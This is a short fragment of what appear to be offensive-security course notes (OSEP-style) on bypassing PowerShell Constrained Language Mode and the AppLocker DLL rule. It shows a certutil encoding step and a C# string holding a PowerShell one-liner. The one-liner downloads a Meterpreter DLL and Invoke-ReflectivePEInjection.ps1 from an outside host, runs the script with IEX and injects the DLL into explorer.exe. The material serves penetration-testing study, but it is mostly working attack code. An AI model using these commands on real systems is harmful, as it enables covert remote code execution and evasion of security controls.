PowerShell Language Mode

 certutil -encode C:\Bypass.exe file.txt

-Reflective C# DLL Injection bypassing AppLocker DLL rule & CLM
+### [Reflective C# DLL Injection](/osep/attack/evasions/c-dll-injection.md#reflective-dll-injection-to-process-with-powershell-in-memory) bypassing AppLocker DLL rule & CLM&#x20;

 String cmd = "$bytes = (New-Object System.Net.WebClient).DownloadData('http://192.168.119.120/met.dll');(New-Object System.Net.WebClient).DownloadString('http://192.168.119.120/Invoke-ReflectivePEInjection.ps1') | IEX; $procid = (Get-Process -Name explorer).Id; Invoke-ReflectivePEInjection -PEBytes $bytes -ProcId $procid";